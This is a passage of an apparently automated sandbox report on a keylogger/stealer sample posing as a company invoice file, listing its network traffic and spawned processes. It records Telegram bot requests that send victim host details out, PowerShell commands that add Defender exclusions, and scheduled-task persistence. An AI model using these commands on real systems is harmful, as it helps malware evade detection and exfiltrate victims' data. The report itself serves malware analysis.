2024-08-29 10:16:31 UTC	706	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:31 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 25174 Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wF0n0npzpEUu1Gq4k%2B8GB5e3HtPQUL2CW9T6YDsmPyquSVb50fSY2qS4dlNNOhrn4OkfSEcewGifA%2BnEZ81h4HbfL7FElHfS5LQDh1I%2BPHRz8MDgnyt8dN3K3b8DFi3CrBoZBRAO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8babc93d6e108c3f-EWR alt-svc: h3=":443"; ma=86400
2024-08-29 10:16:31 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-29 10:16:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	49736	188.114.97.3	443	4820	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 10:16:31 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-08-29 10:16:31 UTC	704	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:31 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 25174 Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2A%2Fz6fyMsr918JSiQtPZbkoRSWyEp1Mlkau2bsiaVXADsffvtDGXFM0QmZKwCbwsv8C%2FOeQheSkxaTe6oO5VjpK6RSDmcO0IQZi7Gge0pSzhCdhBwfKwtTSw3xpaKUXTe21B5tYd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8babc93f69f3c3fd-EWR alt-svc: h3=":443"; ma=86400
2024-08-29 10:16:31 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-29 10:16:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	49739	188.114.97.3	443	4268	C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 10:16:33 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-08-29 10:16:33 UTC	714	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:33 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 25176 Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QU47aGA%2F%2B9PT16SNcB38bH9jpoVk1Bk3Wdh0WJb%2BE6dbyOEnAE%2BV%2BxLX%2B3n680s15uGatnOSjdqwFQ4b9DijF8UoOglrRuMroLo5zoPhPDN6y1ZCn0cMeAU8U2A%2BRkJaVfeSz2nv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8babc946fe8b0caa-EWR alt-svc: h3=":443"; ma=86400
2024-08-29 10:16:33 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-29 10:16:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.10	49740	188.114.97.3	443	4820	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 10:16:33 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-08-29 10:16:33 UTC	716	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:33 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 25176 Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=43i2MjfUPffF%2Bia1LT%2FUhwsU4zw11m0v0BzPBBhWpdyCFqPg%2BFYX7Cp%2BmKmYEIOpMe2uA3WfIC8DV9u3NQJIiic8Gb4RMUBEiOM0pPmS%2FYNfrnrm9M%2Ff3%2FvUwfjnHs8mOda1c%2FEF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8babc9476b9e42b3-EWR alt-svc: h3=":443"; ma=86400
2024-08-29 10:16:33 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-29 10:16:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.10	49742	149.154.167.220	443	4820	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 10:16:33 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2030/08/2024%20/%2000:43:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-08-29 10:16:34 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 29 Aug 2024 10:16:34 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-08-29 10:16:34 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.10	49743	188.114.97.3	443	4268	C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 10:16:34 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-08-29 10:16:34 UTC	708	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:34 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 25177 Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UF8sNsivdJ1thsltp4EX8Fmp2kNFs%2FX3kom2A7%2BGtdVMn6z7G7uCfgYXzi4qpKzeszr2HCmsUb1XKUbmEBHLngz%2FjRL2Sp5S4ykwE9F%2BErdD14B0N4y1Jh6i8V9QLBnL8f06GQzh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8babc94eeeb60cb1-EWR alt-svc: h3=":443"; ma=86400
2024-08-29 10:16:34 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-29 10:16:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.10	49745	188.114.97.3	443	4268	C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 10:16:35 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-08-29 10:16:35 UTC	702	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:35 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 25178 Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cBRDTzQcdWdBbO47NmOJKrOyBNxF8gg7FSnzvAfvKJ%2F8LA7Wl92OCjEjdrnaRCbVWmW2OVkSzO6Ypsg50mabP4AJWbYUe2bHyk74pUlO2qZYbjmLnrNJDB6GLBbLxgV5lAravgUY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8babc956efe55e74-EWR alt-svc: h3=":443"; ma=86400
2024-08-29 10:16:35 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-29 10:16:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.10	49746	149.154.167.220	443	4268	C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 10:16:36 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2029/08/2024%20/%2019:20:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-08-29 10:16:36 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 29 Aug 2024 10:16:36 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-08-29 10:16:36 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	06:16:10
Start date:	29/08/2024
Path:	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"
Imagebase:	0x90000
File size:	792'576 bytes
MD5 hash:	B2FCDE172F7605E8A4AF7B60349418D7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:16:11
Start date:	29/08/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"
Imagebase:	0xf00000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:16:11
Start date:	29/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:16:12
Start date:	29/08/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe"
Imagebase:	0xf00000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:16:12
Start date:	29/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:16:12
Start date:	29/08/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp"
Imagebase:	0x6f0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:16:12
Start date:	29/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	06:16:13
Start date:	29/08/2024
Path:	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"
Imagebase:	0x8c0000
File size:	792'576 bytes
MD5 hash:	B2FCDE172F7605E8A4AF7B60349418D7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	06:16:14
Start date:	29/08/2024
Path:	C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
Imagebase:	0xec0000
File size:	792'576 bytes
MD5 hash:	B2FCDE172F7605E8A4AF7B60349418D7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs Detection: 61%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	06:16:15
Start date:	29/08/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6616b0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	06:16:17
Start date:	29/08/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9536.tmp"
Imagebase:	0x6f0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	06:16:17
Start date:	29/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	06:16:17
Start date:	29/08/2024
Path:	C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe"
Imagebase:	0xe70000
File size:	792'576 bytes
MD5 hash:	B2FCDE172F7605E8A4AF7B60349418D7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	52
Total number of Limit Nodes:	5

Executed Functions

Function 0671F730 Relevance: .6, Instructions: 632COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa99f1cd47a8760b35233fc61c8be6666a8d583b1992800a92a768fd3a354b20
Instruction ID: a388cb886115cb975467703ed415f8ff3c2fde83cb4dad1cfba33b02e761d249
Opcode Fuzzy Hash: fa99f1cd47a8760b35233fc61c8be6666a8d583b1992800a92a768fd3a354b20
Instruction Fuzzy Hash: 88327C71B016049FDB55EB69C460BAEB7F6AF89700F2444AAE146DF3A1CB38ED01CB51

Function 0671AFCC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0671B20E

Strings

Tt, xrefs: 0671B013
Tt, xrefs: 0671B042

Memory Dump Source

Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

